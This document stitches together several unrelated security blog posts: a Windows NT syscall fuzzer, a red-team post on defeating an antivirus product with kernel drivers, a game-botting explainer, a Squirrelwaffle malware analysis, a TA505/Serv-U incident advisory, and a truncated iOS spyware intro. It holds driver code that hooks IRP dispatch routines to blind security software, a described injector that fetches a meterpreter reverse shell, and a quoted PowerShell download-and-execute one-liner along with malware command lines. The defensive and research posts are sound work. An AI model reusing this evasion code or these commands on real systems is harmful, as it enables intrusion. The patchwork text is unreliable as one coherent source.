/// Worker thread for fuzzing
fn worker(id: usize) {
    // Create an RNG
    let rng = Rng::new(0xe06fc2cdf7b80594 + id as u64);

    loop {
        unsafe {
            syscall::syscall0(rng.next() as usize);
        }
    }
}

Yep, that’s all it took.
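The Rng used by the worker isn't shown in this post, so here's a guess at a minimal xorshift-style generator with the same shape; interior mutability via Cell so that next() can take &self, matching the way the worker calls it above:

/// Tiny xorshift64 PRNG; a sketch, not the actual implementation used
pub struct Rng(core::cell::Cell<u64>);

impl Rng {
    /// Create a new PRNG from a non-zero seed
    pub fn new(seed: u64) -> Self {
        Rng(core::cell::Cell::new(seed))
    }

    /// Get the next pseudo-random value
    pub fn next(&self) -> u64 {
        let mut x = self.0.get();
        x ^= x << 13;
        x ^= x >> 7;
        x ^= x << 17;
        self.0.set(x);
        x
    }
}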

Debugging Windows NT Blue Screens

Unfortunately, we're on a pretty legacy system and our tools for debugging are limited, especially for MIPS executables on Windows. It turns out that Ghidra isn't able to load MIPS PEs at all, and Binary Ninja has no support for the debug information.

We started by writing a tool that would scrape the symbol output and information from mipskd (which works very similarly to modern KD), but unfortunately one of the members of my chat claimed a chat reward to have me drop whatever I was doing and rewrite it in Rust.

At that moment we were writing a hacky batch script to dump symbols in a way we could save to disk, rip out of the VM, and then use in Binary Ninja. But, well, now I had to do all of this in Rust.

Parsing DBG COFF

The debug files that ship with Windows NT on the ISO are DI-magic-ed files: separated debug information with a slightly specialized debug header, followed by COFF symbol information. This format is actually relatively well documented, so writing the parser wasn't too much effort. Most of the development time was spent figuring out how to correlate source line information with addresses. Ultimately, the only method I found was to use the statefulness of the sequence of debug symbol entries, associating the current file definition (in sequence with the debug symbols) with the symbols described after it.

I don't know if this is the correct design, as I didn't find it documented anywhere. It is standardized in a few documents, but these DBG files did not follow that format.

I ultimately wrote coff_nm for this parsing, which simply writes to stdout in the format:

F <addr> <function>
G <addr> <global>
S <addr> <source>:<line>

Binary Ninja

Binary Ninja with Pinball.exe open and symbolized

(Fun fact, yes, you can find PPC, MIPS, and Alpha versions of the Space Cadet Pinball game you know and love)

I wrote a very simple Binary Ninja script that allowed me to import this debug information into the program:

from binaryninja import *
import re, subprocess

def load_dbg_file(bv, function):
    rex = re.compile("^([FGS]) ([0-9a-f]{8}) (.*)$")

    # Prompt for debug file input
    dbg_file = interaction \
        .get_open_filename_input("Debug file",
        "COFF Debug Files (*.dbg *.db_)")

    if dbg_file:
        # Parse the debug file
        output = subprocess.check_output(["dbgparse", dbg_file]).decode()
        for line in output.splitlines():
            (typ, addr, name) = rex.match(line).groups()
            addr = bv.start + int(addr, 16)

            (mangle_typ, mangle_name) = demangle.demangle_ms(bv.arch, name)
            if isinstance(mangle_name, list):
                mangle_name = "::".join(mangle_name)

            if typ == "F":
                # Function
                bv.create_user_function(addr)
                bv.define_user_symbol(Symbol(
                    SymbolType.FunctionSymbol, addr, mangle_name,
                    raw_name=name))
                if mangle_typ is not None:
                    bv.get_function_at(addr).function_type = mangle_typ
            elif typ == "G":
                # Global
                bv.define_user_symbol(Symbol(SymbolType.DataSymbol, addr, mangle_name, raw_name=name))
            elif typ == "S":
                # Sourceline
                bv.set_comment_at(addr, name)

        # Update analysis
        bv.update_analysis()

PluginCommand.register_for_address("Load COFF DBG file", "Load COFF .DBG file from disk", load_dbg_file)

This simply prompts the user for a file, invokes the dbgparse tool, parses the output, and then uses Binary Ninja's demangling to demangle names and extract type information (for mangled names). The script tells Binja which functions exist, their names, and their types (from the mangling information); it also applies symbols for globals, and finally it applies source line information as comments.

Thus, we now have a great environment for reading and reviewing NT code for analyzing the crashes we find with our “fuzzer”!

Conclusion

Well, this has gotten a lot longer than expected, and it's also 5am, so I'm just going to upload this as is; hopefully it's not a mess, as I'm not reading through it to check for errors. Anyways, I hope you enjoyed this write-up of the 3 streams so far on this content. It's been a really fun project, and I hope that you tune into my live streams and watch the next steps unfold!

~Gamozo

Kernel Karnage – Part 3 (Challenge Accepted)

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven't done any reverse engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running, and neither does eelam.sys, which I presume is only used during the initial stages of boot to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I'm still working on expanding my own driver to include callback functionality, which will also cover image load callbacks, used to detect the loading of drivers and so on. Luckily, the Evil driver has this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good, although easy to detect, way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver's dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver's name in the format \\Driver\\DriverName. In this case, the driver's name is derived from the driver's file name on disk: mydriver.sys -> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if (isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original dispatch routine
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto OriginalDispatch = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return OriginalDispatch(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //complete the request ourselves and discard the IRP
        status = STATUS_INVALID_DEVICE_REQUEST;
        return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original dispatch routine
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto OriginalDispatch = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return OriginalDispatch(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
    for (int i = 0; i < MaxIntercept; i++) {
        if (globals.Drivers[i].DriverObject == DriverObject) {
            if (globals.Drivers[i].DriverUnload) {
                globals.Drivers[i].DriverUnload(DriverObject);
            }
            UnhookDriver(i);
        }
    }
    NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck; mimikatz.exe was still detected and blocked. This got me thinking: running such a well-known malicious binary without any attempt to hide or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I opted for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load, registry, and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

New World’s Botting Problem

Source: https://pbs.twimg.com/profile_images/1392124727976546307/vBwCWL8W_400x400.jpg

New World, Amazon’s latest entry into the gaming world, is a massive multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

  • Actual cheaters trying to take shortcuts and get ahead
  • People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
  • Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like OwnedCore.com exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like g2g.com.

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like pyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like UnknownCheats.me.

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect if tools are monitoring the game's screen or taking automated actions. It's not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it's really a never-ending game of cat and mouse. That said, there are plenty of legitimate tools out there that make this a much safer option, such as running the screen watcher on a totally different computer. Windows Remote Desktop, TeamViewer, or some sort of VNC are perfectly normal tools one would run to check in on their computer remotely. Who's to say they couldn't monitor the screen this way? Well, nothing stops them. And that's exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, running a bot with this method could still be detected, but doing so takes much more effort and is more prone to false positives, which may be against the interest of the game studio if it were to falsely ban legitimate players.

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won't be posting a direct tutorial on how to build your own bot, I'd like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which, incidentally, are noted to have been detected by the anti-cheat and to have gotten players banned already.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what are the components we'll need?

  • A way to capture a portion of the screen
  • A way to detect a specific pattern in the screen capture
  • A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss

while True:
    # 500x500 pixel region
    region = (500, 500, 1000, 1000)
    with mss.mss() as screen:
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our image. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
from numpy import array

# Template image to search for
to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_UNCHANGED)

while True:
    # 500x500 pixel region
    region = (500, 500, 1000, 1000)

    # Grab region
    with mss.mss() as screen:
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")

    # Convert image to a format usable by cv2
    img_cv = cv2.cvtColor(array(img), cv2.COLOR_RGB2BGR)

    # Check if the tenable logo is present
    result = cv2.matchTemplate(img_cv, to_detect, cv2.TM_CCOEFF_NORMED)
    if (result >= 0.6).any():
        print('DETECTED')
        break

Running the above and dragging a copy of the logo into the monitored region of the screen will trigger the "DETECTED" message. Note that this code snippet may not work exactly as written depending on your monitor setup and configured resolution; some settings might need to be tweaked in certain scenarios.

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.

What’s being done about it?

What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue, as it isn't unique to this game by any stretch of the imagination. The purpose was to shed some light, for those who may be unaware, on how basic many of these botting services actually are.



The Newest Malicious Actor: “Squirrelwaffle” Malicious Doc.

Authored By Kiran Raj

Due to their widespread use, Office documents are commonly used by malicious actors as a way to distribute malware. McAfee Labs has observed a new threat, "Squirrelwaffle", an emerging malware family seen in mid-September using Office documents to infect systems with Cobalt Strike.

In this blog, we will take a quick look at the SquirrelWaffle malicious doc and understand the initial infection vector.

Geolocation-based stats of the Squirrelwaffle malicious doc observed by McAfee from September 2021:

Figure-1: Geo-based stats of SquirrelWaffle Malicious Doc

 

Infection Chain

  1. The initial attack vector is a phishing email with a malicious link hosting malicious docs
  2. On clicking the URL, a ZIP archive containing the malicious doc is downloaded
  3. The malicious doc is weaponized with an AutoOpen VBA function. Upon opening the malicious doc, it drops a VBS file containing obfuscated PowerShell
  4. The dropped VBS script is invoked via cscript.exe to download malicious DLLs
  5. The downloaded DLLs are executed via rundll32.exe with the export function "ldr" as an argument

Figure-2: Infection Chain

Malicious Doc Analysis

Here is how the face of the document looks when we open it (Figure-3). Normally, macros are disabled from running by default in Microsoft Office. The malware authors are aware of this and hence present a lure image guiding victims into enabling the macros.

Figure-3: Image of Word Document Face

UserForms and VBA

The VBA UserForm Label components present in the Word document (Figure-4) are used to store all the content required for the VBS file. In Figure-4, we can see that the userform's LabelBox "t2" has VBS code in its caption.

The subroutine "eFile()" retrieves the LabelBox captions, writes them to C:\Programdata\Pin.vbs, and executes the script using cscript.exe:

Cmd line: cmd /c cscript.exe C:\Programdata\Pin.vbs

Figure-4: Image of Userforms and VBA

VBS Script Analysis

The dropped VBS script is obfuscated (Figure-5) and contains 5 URLs that host payloads. The script runs in a loop to download the payloads using PowerShell, writing them to the C:\Programdata location in the format www[1-5].dll. Once a payload is downloaded, it is executed using rundll32.exe with the export function name "ldr" as a parameter.

Figure-5: Obfuscated VBS script

De-obfuscated VBS script

The VBS script after de-obfuscation (Figure-6):

Figure-6: De-obfuscated VBS script

MITRE ATT&CK

Different techniques and tactics are used by the malware, and we mapped these to the MITRE ATT&CK framework.

  • Command and Scripting Interpreter (T1059)

The malicious doc's VBA drops and invokes the VBS script.

CMD: cscript.exe C:\ProgramData\pin.vbs

  • Signed Binary Proxy Execution (T1218)

Rundll32.exe is used to execute the dropped payload.

CMD: rundll32.exe C:\ProgramData\www1.dll,ldr

IOC

Type  Value  Scanner  Detection Name
Main Word Document  195eba46828b9dfde47ffecdf61d9672db1a8bf13cd9ff03b71074db458b6cdf  ENS, WSS  W97M/Downloader.dsl
Downloaded DLL  85d0b72fe822fd6c22827b4da1917d2c1f2d9faa838e003e78e533384ea80939  ENS, WSS  RDN/Squirrelwaffle
URLs to download DLL  priyacareers.com, bussiness-z.ml, cablingpoint.com, bonus.corporatebusinessmachines.co.in, perfectdemos.com  WebAdvisor  Blocked

TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

NCC Group's global Cyber Incident Response Team have observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor, a known cybercrime group notorious for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor's usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim's network. Exploitation also causes Serv-U to log an exception, as described in the mitigations section below.

Execution

We observed that Base64 encoded PowerShell commands were executed shortly after the Serv-U exceptions indicating exploitation were logged. The PowerShell commands ultimately led to deployment of Cobalt Strike Beacons on the system running the vulnerable Serv-U software. The PowerShell command observed deploying Cobalt Strike can be seen below:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://IP:PORT/a'))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled task named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to the FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly back up the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID\. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP servers in your network and checking their logs for traces of exceptions similar to those mentioned in the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds describe follow-up activity from a completely different threat actor than the one we observed in our investigations.

Microsoft's article [3] on CVE-2021-35211 provides guidance on detecting abuse of the vulnerability. The first indicator of compromise for exploitation of this vulnerability is suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder and contains exceptions logged at the time of exploitation of CVE-2021-35211. NCC Group's analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.

Check for RegIdleBackup task abuse

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content.

Check for altered RegIdleBackup task

Export-ScheduledTask -TaskName "RegIdleBackup" -TaskPath "\Microsoft\Windows\Registry\" | Select-String -NotMatch "<ClassId>{CA767AA8-9157-4604-B64B-40747123D5F2}</ClassId>"

Check for suspicious CLSID registry key content

Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{SUSPICIOUS_CLSID}'

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

  • Check if your Serv-U version is vulnerable
  • Locate the Serv-U’s DebugSocketlog.txt
  • Search for entries such as 'EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();' in this log file
  • Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
  • Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
    • In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
  • If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021, after Microsoft published about the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers was still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Amount  Country 
1141  China 
549  United States 
99  Canada 
92  Russia 
88  Hong Kong 
81  Germany 
65  Austria 
61  France 
57  Italy 
50  Taiwan 
36  Sweden 
31  Spain 
30  Vietnam 
29  Netherlands 
28  South Korea 
27  United Kingdom 
26  India 
21  Ukraine 
18  Brazil 
17  Denmark 

Top vulnerable versions identified: 

Amount  Version 
441  SSH-2.0-Serv-U_15.1.6.25 
236  SSH-2.0-Serv-U_15.0.0.0 
222  SSH-2.0-Serv-U_15.0.1.20 
179  SSH-2.0-Serv-U_15.1.5.10 
175  SSH-2.0-Serv-U_14.0.1.0 
143  SSH-2.0-Serv-U_15.1.3.3 
138  SSH-2.0-Serv-U_15.1.7.162 
102  SSH-2.0-Serv-U_15.1.1.108 
88  SSH-2.0-Serv-U_15.1.0.480 
85  SSH-2.0-Serv-U_15.1.2.189 

MITRE ATT&CK mapping

Tactic  Technique  Procedure 
Initial Access  T1190 – Exploit Public Facing Application(s)  TA505 exploited CVE-2021-35211 to gain remote code execution. 
Execution  T1059.001 – Command and Scripting Interpreter: PowerShell  TA505 used Base64 encoded PowerShell commands to download and run Cobalt Strike Beacons on target systems. 
Persistence  T1053.005 – Scheduled Task/Job: Scheduled Task  TA505 hijacked a scheduled task named RegIdleBackup and abused the COM handler associated with it to execute malicious code and gain persistence. 
Defense Evasion  T1112 – Modify Registry  TA505 altered the registry so that the RegIdleBackup scheduled task executed the FlawedGrace RAT loader, which was stored as Base64 encoded strings in the registry. 

References 

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211 

[2] https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211 

[3] https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ 

How iOS Malware Can Spy on Users Silently

Welcome to the first post of our latest blog series:

Mobile Attackers Mindset

In this blog series, we're going to cover how mobile threat actors think, what techniques attackers use to overcome security protections, and what indications reveal that our phones and tablets are compromised.

In this first blog, we’ll demonstrate how the recently added camera & microphone green/orange indicators do not pose a real security challenge to mobile threat actors.


Starting with iOS 14, there are a couple of new indicators: a green dot and an orange dot. These indicators signal when the camera or the microphone is accessed.

We worry less about the phone listening to us when there is no green or orange dot.

Source: https://support.apple.com/en-in/HT211876

We know that malware like NSO/Pegasus is capable of listening to the microphone. Can NSO Group and the hundreds of other threat actors that target mobile devices take videos of us while the visual indicator is off? 

Let’s examine if this feature poses any challenge to attackers.

Logical issues

Let’s think about it first. Is the indicator really on every time the camera or microphone is accessed? Siri quickly comes to mind: how does the phone know when we say “Hey Siri” if the microphone indicator is not on all the time? The phone must be listening somehow, right?

“Hey Siri” 

